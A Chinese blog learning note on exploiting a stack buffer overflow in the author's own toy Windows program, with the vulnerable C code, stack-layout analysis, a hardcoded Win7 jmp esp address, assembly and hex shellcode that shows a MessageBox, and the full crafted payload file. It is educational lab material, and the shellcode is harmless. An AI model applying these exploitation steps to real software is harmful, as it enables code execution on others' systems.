栈溢出笔记(1)

最新推荐文章于 2023-05-23 11:14:43 发布
最新推荐文章于 2023-05-23 11:14:43 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞原理 文章标签: ShellCode 漏洞 0day 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PandaOS/article/details/46655365
版权

实践是检验真理的唯一标准

栈溢出的原理非常简单,但是实际操作起来确实问题多多。

- 准备工具

  • WinHex
  • vc++6.0
  • 一双勤奋的手和善于思考的大脑
#include <stdio.h>
#include <windows.h>
const char * FileName = "reg.txt"; 
const char * trueCode = "1245";
#define Msg(STR)( MessageBoxA(NULL,STR,NULL,MB_OK))
int _stdcall  RegGo()
{
    char FileBuf[8];
    char cNow;
    int nIndex = 0;
    FILE *fp;
    memset(FileBuf,0,sizeof(FileBuf));
    fp=fopen(FileName,"r");
    if(fp==NULL)
    {
        Msg("导入注册文件失败\n");
        ExitProcess(-1);
    }
    fscanf(fp,"%s",FileBuf);
    if(!strcmp(trueCode,FileBuf))
    {
        Msg("你的注册文件输入正确! 恭喜");
        return 0;
    }
    Msg("你的注册文件好像有些问题!");
    return 0;
}

int _stdcall WinMain(
    HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow
)
{
    RegGo();
    MessageBoxA(NULL,"Hello world!\n",NULL,MB_OK);
}

编译:vc++6.0 Win32 Release
选项:C/C++ 优化禁用
这是一段存在溢出漏洞的程序。存在漏洞的函数时RegGo()
char FileBuf[8]; 存放验证文件数据的缓冲区只有8字节,实际上只能够储蓄7个字符 + 一个0结尾。
fscanf(fp,”%s”,FileBuf); 读入文件的数据,格式为%s。也就是说调用这个函数,它会从文件中读取一串以0结尾的字符串,然后放入FileBuf。
这里没有做长度限制,所以如果文件的长度超过7个字节就会造成溢出。又因为FileBuf是第一个变量,所以FileBuf[8] 就是上层函数ebp的所在处(注意这里的FileBuf是1字节大小)
所以文件的第9~12 字节就会覆盖上层函数框架ebp的值。
第13~16字节就会覆盖返回地址。
所以通过对reg.txt 文件的构造就可以实现漏洞利用。
出错啦

感谢前辈们的方法,通过把返回地址覆盖为 jmp esp的地址来“导航”我们ShellCode。

这里给出一个在win7上比较通用的jmp esp地址。

0x7ffa4512 jmp esp

我们的文件构造为 4141414141414141 FFFFFFFF 1245FA7F
载入程序。。。。。。
好的,先用OD在这里下一个硬件执行断点吧,到了关键时刻我喜欢单步。
jmp esp
再继续往下走就是RegGo的栈区域以上的地方了,这里基本上都是数值,而不是代码,所以你根本看不懂这些乱七八糟的汇编代码是干啥的。
我们接着来编写ShellCode。
ShellCode的功能分析:
1、弹出一个MessageBoxA -> Hello
2、使程序正常退出。

首先在ShellCode的入口处程序要做的第一件事情就是构造Hello。 因为在ShellCode不能出现 0 字节,所以要通过寄存器的运算来间接构造,如xor ebx,ebx
0x6F6C6C65 为 olle,这是因为push的操作码的长度是4字节esp-4
还有一个h
通过esp-1 并mov实现。

0012FEFC    33DB            xor ebx,ebx
0012FEFE    53              push ebx
0012FEFF    68 656C6C6F     push 0x6F6C6C65
0012FF04    4C              dec esp
0012FF05    C60424 68       mov byte ptr ss:[esp],0x68

此时此刻,esp的值就是hello字符串的地址。
OD alt+g 然后 输入MessageBoxA 查询到该函数的地址为 MessageBoxA 0x7740ea11

ShellCode中根据MessageBoxA的参数分别把数据压入栈中。

0012FF09    8BC4            mov eax,esp
0012FF0B    53              push ebx
0012FF0C    53              push ebx
0012FF0D    50              push eax
0012FF0E    53              push ebx
0012FF0F    B8 11EA4077     mov eax,user32.MessageBoxA
0012FF14    FFD0            call eax

安全退出需要调用ExitProcess(0x75FA427E)

0012FF16    B8 7E42FA75     mov eax,KernelBa.ExitProcess
0012FF1B    53              push ebx
0012FF1C    FFD0            call eax

完整的ShellCode代码:

0012FEFC    33DB            xor ebx,ebx
0012FEFE    53              push ebx
0012FEFF    68 656C6C6F     push 0x6F6C6C65
0012FF04    4C              dec esp
0012FF05    C60424 68       mov byte ptr ss:[esp],0x68
0012FF09    8BC4            mov eax,esp
0012FF0B    53              push ebx
0012FF0C    53              push ebx
0012FF0D    50              push eax
0012FF0E    53              push ebx
0012FF0F    B8 11EA4077     mov eax,user32.MessageBoxA
0012FF14    FFD0            call eax
0012FF16    B8 7E42FA75     mov eax,KernelBa.ExitProcess
0012FF1B    53              push ebx
0012FF1C    FFD0            call eax

通过OD的二进制复制功能把这段ShellCode的二进制代码复制出来。

33 DB 53 68 65 6C 6C 6F 4C C6 04 24 68 8B C4 53 53 50 53 B8 11 EA 40 77 FF D0 B8 7E 42 FA 75 53
FF D0

很好,很有成就感!

接着打开WinHex继续构造我们的reg.txt
将这段ShellCode接在文件偏移为0x10的地方,也就是jmp esp地址的后面。

完整reg.txt:
4141414141414141 FFFFFFFF 1245FA7F 33DB5368656C6C6F4CC60424688BC453535053B811EA4077FFD0B87E42FA7553FFD0

以上就是我今晚实践的全部结果了。ShellCode的写得非常随意,我还需要好好的学习一下大神们的写法。

用到的硬编码 win7:
jmp esp 0x7ffa4512
MessageBoxA 0x7740ea11
ExitProcess 0x75FA427E

stdcall 调用方式有参数情况溢出利用实验:
修改源代码:RegGo增加一个参数:int _stdcall RegGo(const char *pas1)

00401053 |> \8D55 F8 lea edx,[local.2]
在这里下断得到FileBuf的基址。
然后把reg.txt的内容改为8个A,用od跟踪到retn指令。
retn指令:
retn指令带参数,设参数为x。
pop eip add esp,x可以平衡堆栈。
RegGo有一个参数,所以编译器编译后用的是retn 0x4
所以我们的ShellCode要在定位代码后面留一个空位,这个空位会覆盖参数。

堆栈图:
0012FEE8 41414141 AAAA
0012FEEC 41414141 AAAA
0012FEF0 0012FE00 .?.
0012FEF4 004010B8 ?@. 返回到 TestBug.004010B8 来自 TestBug.00401000
0012FEF8 00408040 @€@. ASCII “1245” 这个是参数哦
0012FEFC /0012FF88 ?.

retn指令执行后esp的值为:0012FEFC
所以我们构造ShellCode如下:
41414141 41414141 FFFFFFFF 【jmp esp地址】 FFFFFFFF 【ShellCode】

总结:在漏洞分析过程最重要的就是仔细调试,分析出函数的调用方式参数等。
附件整理:
链接:http://pan.baidu.com/s/1hqer5NQ 密码:llwn

PandaOS
关注
专栏目录
栈溢出学习(上)
I'm five的博客
01-02 187
栈溢出学习(上)基础理论ShellcodeReturn2libc简单例题: level2 基础理论 Shellcode 修改返回地址,让其指向溢出数据中的一段指令 要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。攻击指令一般都是用来打开 shell,从而可以获得当前进程的控制权,所以这类指令片段也被成为“shellcode”。shellcode 可以用汇编语言来写再转成对应的机器码,也可以上网搜索直接复制粘贴,这里就不再赘述。下面我们先写出溢出数据的组成,再确定对应的各部
栈溢出学习(下)
I'm five的博客
01-09 206
栈溢出学习(下)基础理论ROP ( Return Oriented Programming )Hijack GOT 基础理论 ROP ( Return Oriented Programming ) 修改返回地址,让其指向内存中已有的一段指令 要完成的任务包括:在内存中确定某段指令的地址,并用其覆盖返回地址。 payload : padding + address of gadget 如果想连续执行若干段指令,就需要每个 gadget 执行完毕可以将控制权交给下一个 gadget。所以 gadget 的最后
QtDemos:这是Qt演示的集合,以解决StackOverflow所带来的问题,否则我将面临
02-05
QtDemos:这是Qt演示的集合,以解决StackOverflow所带来的问题,否则我将面临
Q60:栈溢出(stack overflow)
不积跬步无以至千里
07-03 1067
栈溢出相关。
Stack overflow 错误 栈溢出的原因及解决办法(vs2017 && Qt)
weixin_43294620的博客
03-31 9521
Stack overflow 错误 栈溢出的原因及解决办法(vs2017 && Qt) 在处理图像的时候发生了如下错误: 0x00007FF7B0556FF8 处有未经处理的异常(在 Open_SIM.exe 中): 0xC00000FD: Stack overflow (参数: 0x0000000000000001, 0x00000031C87A3000)。 同样的,类似的错误也可以是在Qt中发生: The inferior stopped because it triggered a
Qt qApp->processEvents() 导致0xC00000FD堆栈溢出问题解决办法
最新发布
qq_20964425的专栏
05-23 809
解决办法目前想到的是有两个,一个是在建立connect信号槽连接时,通过Qt::BlockingQueuedConnection配置项,在处理信号过程中阻塞住当前线程,这样就不会发生递归;另一种方法则是,增加一个变量标识当前是正在处理信号还是空闲,当只有在空闲时才去发送信号给主线程,其本质上也是一种阻塞办法,防止递归的繁盛。在运行过程中,可能会存在主线程在处理事件过程中,子线程恰好重新发送了新的信号过来,这个时候就会进入processEvents的递归过程,最终无法跳出该递归,导致堆栈溢出
QApplication:processEvents()递归调用,导致栈溢出(stack overflow)崩溃
beibeix2015的博客
01-29 2914
原帖 Qt学习之系列[9] – QCoreApplication:processEvents()可能会引起递归,导致栈溢出崩溃 过程描述 主线程中槽函数调用prcessEvents()用于处理消息队列中的消息; 子线程中循环发送信号,该信号由主线程的槽函数接收; 跨线程的信号槽消息是通过消息队列来实现,槽函数中的processEvents()函数,反过来调用槽函数,导致调用栈(线程栈)持续增长,空间耗尽崩溃; 问题 测试环境 VS2017 Qt 5.9.4 CMake 3.16.5 在槽函
Pwn,我的栈溢出笔记就该这么写(上)
weixin_54150681的博客
12-05 194
一周的刨坟结束了,忙着搭建维护k8s,该整个小小的笔记了 原理篇 什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 栈溢出会导致什么结果? 栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。 如何防范栈溢出? (1).金丝雀(canary) 1、 在所有函数调用发生时,向栈帧内压入一个额外的随机 DWORD(数),这个随机数被称作 “canary”,函数执行完在返回之前,程序通过检查这个随机数
Windows栈溢出学习笔记
不想当脚本小子的脚本小子
02-22 1106
Windows下栈溢出: 1.高级语言编译链接后变成PE文件,PE装载运行后变成进程。 2.系统栈: 操作系统为进程中的每个函数调用都划分了一个栈帧空间,(系统自动分配)系统栈是这些函数调用栈帧的集合; 系统栈由系统自动维护: 1)随着函数调用层数的增加,函数栈帧是一块块地向内存低地址方向延伸的,当前正在运行的函数的栈帧总是在栈顶; 2)随着进程中函数调用层数的减少,即各函数调用的返回,栈...
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1913
一个小白的慢慢理会过程
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 633
写题笔记
JVM学习笔记——虚拟机栈的溢出
qq_35540562的博客
01-26 460
一、虚拟机栈 Java虚拟机栈(Java Virtual Machine Stacks) 是线程私有的,它的生命周期与线程相同。虚拟机栈描述的是Java方法执行的内存模型:每个方法在执行的同时都会创建一个栈帧(Stack Frame)。每个方法从被调用到完成,就对应这一个栈帧在虚拟机栈的入栈到出栈的过程。 虚拟机栈隔离的,每个线程都有自己独立的虚拟机栈。 在 Java 虚拟机规范中,对虚拟机栈这...
重谈eixt(0),ExitProcess,和TerminateProcess的区别和联系
热门推荐
酋长Clement ——成长之路
01-12 2万+
首先来谈谈一个进程的执行流程。每个应用程序都有个主函数,在WINDOWS下,只支持两种类型的应用程序——CUI(控制台应用程序)和GUI(图形界面应用程序),相应的,其主函数类型不同。来看下这几个入口函数 int WINAPI WinMain(HINSTANCE hinstEx
使用ExitProcess()结束进程
电脑翻译官的专栏
01-17 3802
进程只是提供了一段地址空间和内核对象,其运行时通过在其地址空间内的主线程来体现的。当主线程的进入点函数返回时,进程也就随之结束。这种进程的终止方式是进程的正常退出,进程中的所有线程资源都能够得到正确的清除。除了这种进程的正常退出方式外,有时还需要在程序中通过代码来强制结束本进程或其他进程的运行。ExitProcess()函数的原型为: void ExitProcess(UINT uExitC
栈溢出的常见情况
DHL1234567的专栏
09-04 3841
一、局部数组过大。当函数内部的数组过大时,有可能导致堆栈溢出。 例如:
ExitProcess 参数问题
期待下集是个可爱梦儿
05-06 1041
VOID ExitProcess(  UINT uExitCode);uExitCode即退出代码,是个UINT 类型,这个代码一般没有用途,我们一般可以填入0。对于父进程(不一定是父进程,拥有该进程句柄都算)可以通过GetExitCodeThread获取进程的退出代码。这个代码用来告诉父进程程序退出原因,填入什么没有特别规定,可以自己约定,一般来说填入0表示正常退出,其他表示非正常退出。转载于:http://wenwen.soso.com/z/q195158932.htm
《计算机安全》课程笔记:深入浅出栈溢出攻击
"《计算机安全》课程笔记1包含了网络五层结构、Wireshark的使用、虚拟机管理、栈溢出攻击的基础知识以及防御方法等内容。" 在这篇笔记中,首先提到了网络的五层结构,这是理解网络通信的基础。通常,这个结构包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值